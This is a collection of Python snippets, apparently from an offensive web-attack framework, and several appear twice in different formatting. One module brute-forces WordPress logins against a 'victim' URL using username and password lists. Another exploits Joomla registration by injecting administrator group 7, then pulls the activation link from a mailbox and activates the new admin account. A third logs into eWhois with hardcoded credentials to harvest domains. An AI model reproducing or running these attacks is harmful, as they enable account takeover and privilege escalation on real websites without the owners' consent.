def run(self, frmwk, args): module_name = 'attack/web_bruter' frmwk.print_status('Init paprams!') victim = HTTP(self.options['URL'], timeout = self.advanced_options['TIMEOUT']) victim.storecookie = True checktype = 'successstr' tokenstr = 'no-unread-messages' param = 'log=__USER__&pwd=__PASS__&wp-submit=Log+In&redirect_to='+quote_plus(self.options['URL'])+'&testcookie=1' frmwk.print_status('Start bruteforcer!') bruter = frmwk.modules[module_name] bruter.options.addString('URL', 'Link login', default = self.options['URL']) bruter.options.addString('USERNAME', 'Account login', default = self.options['USERNAME']) bruter.options.addString('PASSWORD', 'Password login', default = self.options['PASSWORD']) bruter.options.addString('DATA', 'Date with POST method', default = param) bruter.options.addString('CHECKTYPE', 'Type of checker success login', default = checktype) bruter.options.addString('TOKEN', 'Error string', default = tokenstr) bruter.options.addInteger('THREADS', 'Date with POST method', default = self.options['THREADS']) bruter.options.addPath('USERLIST', 'passwords to test', default = self.options['USERLIST']) bruter.options.addPath('PASSLIST', 'usernames to test', default = self.options['PASSLIST']) bruter.options.addBoolean('VERBOSE', 'Verbose', default = self.options['VERBOSE']) bruter.advanced_options.addString('COOKIE', 'Cookie', default = victim.headers['Cookie'] if victim.headers['Cookie'] else None) bruter.advanced_options.addInteger('DELAY', 'Delay time', default = self.advanced_options['DELAY']) bruter.advanced_options.addInteger('TIMEOUT', 'Time out request', default = self.advanced_options['TIMEOUT']) bruter.advanced_options.addBoolean('STOP', 'Stop scanning', default = True) bruter.run(frmwk, None) frmwk.reload_module(module_name)
def run(self, frmwk, args): module_name = 'attack/web_bruter' frmwk.print_status('Init paprams!') victim = HTTP(self.options['URL'], timeout=self.advanced_options['TIMEOUT']) victim.storecookie = True checktype = 'successstr' tokenstr = 'no-unread-messages' param = 'log=__USER__&pwd=__PASS__&wp-submit=Log+In&redirect_to=' + quote_plus( self.options['URL']) + '&testcookie=1' frmwk.print_status('Start bruteforcer!') bruter = frmwk.modules[module_name] bruter.options.addString('URL', 'Link login', default=self.options['URL']) bruter.options.addString('USERNAME', 'Account login', default=self.options['USERNAME']) bruter.options.addString('PASSWORD', 'Password login', default=self.options['PASSWORD']) bruter.options.addString('DATA', 'Date with POST method', default=param) bruter.options.addString('CHECKTYPE', 'Type of checker success login', default=checktype) bruter.options.addString('TOKEN', 'Error string', default=tokenstr) bruter.options.addInteger('THREADS', 'Date with POST method', default=self.options['THREADS']) bruter.options.addPath('USERLIST', 'passwords to test', default=self.options['USERLIST']) bruter.options.addPath('PASSLIST', 'usernames to test', default=self.options['PASSLIST']) bruter.options.addBoolean('VERBOSE', 'Verbose', default=self.options['VERBOSE']) bruter.advanced_options.addString('COOKIE', 'Cookie', default=victim.headers['Cookie'] if victim.headers['Cookie'] else None) bruter.advanced_options.addInteger( 'DELAY', 'Delay time', default=self.advanced_options['DELAY']) bruter.advanced_options.addInteger( 'TIMEOUT', 'Time out request', default=self.advanced_options['TIMEOUT']) bruter.advanced_options.addBoolean('STOP', 'Stop scanning', default=True) bruter.run(frmwk, None) frmwk.reload_module(module_name)
def eWhois(self, searcher): params = urlencode({'_method':'POST','data[User][email]':'*****@*****.**','data[User][password]':'RitX:::R1tX','data[User][remember_me]':'0'}) req = HTTP("http://www.ewhois.com/") req.storecookie = True req.rand_useragent = False data = req.Request('http://www.ewhois.com/login/', 'POST', params) data = req.Request("http://www.ewhois.com/export/ip-address/%s/" % self.ip) urls = findall(r'"(.*?)","","","[UA\-[0-9]+\-[0-9]+|]",""',data) self.frmwk.print_status(self.fmt_string.format(searcher['SITE'],urls.__len__())) self.domains += urls
def run(self, frmwk, args): url = self.options['URL'] email = CONFIG.GMAIL_ACCOUNT[0] self.username = '******' + str(randint(1000,100000)) self.password = '******' victim = HTTP(url) victim.storecookie = True exploit = 'jform%5Bname%5D=exploit&jform%5Busername%5D=exploit&jform%5Bpassword1%5D=123123&jform%5Bpassword2%5D=1231233&jform%5Bemail1%5D=pentest%40yahoo.com&jform%5Bemail2%5D=pentest%40yahoo.com&option=com_users&task=registration.register&jform%5Bgroups%5D%5B%5D=7&' registry = 'jform%5Bname%5D={0}&jform%5Busername%5D={0}&jform%5Bpassword1%5D={1}&jform%5Bpassword2%5D={1}&jform%5Bemail1%5D={2}&jform%5Bemail2%5D={2}&option=com_users&task=registration.register&jform%5Bgroups%5D%5B%5D=7&'.format(self.username, self.password, email) frmwk.print_status('Init token') data = victim.Request(url) token = search('name="([a-zA-Z0-9]{32})"\svalue="1"', data) if token: token = token.group(1) else: token = '' frmwk.print_status('Send false request') url = url + '?task=registration.register' victim.Request(url, 'POST', exploit + token + '=1') frmwk.print_status('Send exploit request') data = victim.Request(url, 'POST', registry + token + '=1') warning = search('class="warning\smessage">(.*?)</dd>', data, DOTALL) message = search('class="message\smessage">(.*?)</dd>', data, DOTALL) if warning: frmwk.print_error('Error during exploit : ' + warning.group(1)) return elif message: frmwk.print_success('Successful : ' + message.group(1).strip()) frmwk.print_success('Account login: %s | %s' % (self.username, self.password)) else: frmwk.print_status('HĂȘn xui !') frmwk.print_status('Sleep 30s for mail receiver !') sleep(30) for email in self.getMail(): active = search('(http(.*?)activate&token=(.*?))\s', email['body'], DOTALL) if active: active_link = active.group(1) frmwk.print_status('Active link: ' + active_link) break if active_link: data = victim.Request(active_link) message = search('class="message\smessage">(.*?)</dd>', data, DOTALL) if message: frmwk.print_success('Actived Account: %s | %s' % (self.username, self.password))
def eWhois(self, searcher): params = urlencode({ '_method': 'POST', 'data[User][email]': '*****@*****.**', 'data[User][password]': 'RitX:::R1tX', 'data[User][remember_me]': '0' }) req = HTTP("http://www.ewhois.com/") req.storecookie = True req.rand_useragent = False data = req.Request('http://www.ewhois.com/login/', 'POST', params) data = req.Request("http://www.ewhois.com/export/ip-address/%s/" % self.ip) urls = findall(r'"(.*?)","","","[UA\-[0-9]+\-[0-9]+|]",""', data) self.frmwk.print_status( self.fmt_string.format(searcher['SITE'], urls.__len__())) self.domains += urls